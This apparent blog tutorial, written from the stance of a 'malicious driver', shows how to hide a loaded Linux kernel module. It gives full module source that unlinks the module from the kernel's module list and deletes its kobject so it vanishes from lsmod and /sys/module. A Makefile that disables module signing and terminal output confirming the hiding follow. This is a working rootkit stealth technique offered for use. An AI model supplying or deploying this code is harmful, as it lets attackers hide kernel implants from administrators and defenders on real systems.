Linux hidden driver module

As a malicious driver, you definitely hope that your own module will not be discovered after loading. Then you need to hide the installed driver module, unlink it at the driver initialization entry, and delete the kobject of the current module by the kobject_del() function to play in lsmod And hidden in /sys/module.

list_del_init(&__this_module.list);

test.c

#include <linux/module.h>

MODULE_LICENSE("GPL"); 
MODULE_AUTHOR("curtis li");/*作者*/
MODULE_DESCRIPTION("HELLO");
MODULE_VERSION("1.0");//版本号

   static int hello_init(void)
    {
    
    
        unsigned int cpu = get_cpu();
        printk("-----%d-----\n",cpu);
        struct module *mod;
        printk(KERN_ALERT "this module: %p==%p\n", &__this_module, THIS_MODULE );
        printk(KERN_ALERT "module state: %d\n", THIS_MODULE->state );
        printk(KERN_ALERT "module name: %s\n", THIS_MODULE->name );
        printk(KERN_ALERT"module version:%s\n",THIS_MODULE->version);
        //遍历所有驱动，dmesg查看
        list_for_each_entry(mod, *(&THIS_MODULE->list.prev), list )
        printk(KERN_ALERT "module name: %s\n", mod->name );
        //从全局链表中摘除
        list_del_init(&__this_module.list);
        //删除当前模块kobject
        kobject_del(&THIS_MODULE->mkobj.kobj);
        return 0;
    }
 
    static void hello_exit(void)
    {
    
    
        printk(KERN_ALERT "module state: %d\n", THIS_MODULE->state );
        printk("find_module bye...\n");
    }
 
module_init(hello_init);
module_exit(hello_exit);

Makefile:

CONFIG_MODULE_SIG=n

ifeq ($(KERNELRELEASE),)

ROOTS_DIR = /root/
#内核源码路径，不同环境可能会不一样，内核源码一定要先编译
KERNEL_DIR = /lib/modules/$(shell uname -r)/build
CUR_DIR = $(shell pwd)

all: 
  make -C $(KERNEL_DIR) M=$(CUR_DIR) modules
clean :
  make -C $(KERNEL_DIR) M=$(CUR_DIR) clean
install:
  insmod test.ko
uninstall:
  rmmod test
    
else
#用于指定到底编译的是哪个代码--hello.c
obj-m += test.o
#obj-m += math.o
endif

After the driver is loaded, you can use lsmod to find out whether the driver is installed successfully, the ko name is the name of the module after installation

curtis@curtis-virtual-machine:~/Desktop/test$ lsmod | grep test
curtis@curtis-virtual-machine:~/Desktop/test$ 

In addition to the lsmod command and the corresponding viewing /proc/modules, you can also find existing modules by viewing the /sys/module/ directory

curtis@curtis-virtual-machine:~/Desktop/test$ ls
Makefile  modules.order  Module.symvers  test.c  test.ko  test.mod  test.mod.c  test.mod.o  test.o
curtis@curtis-virtual-machine:~/Desktop/test$ ls /sys/module/ | grep test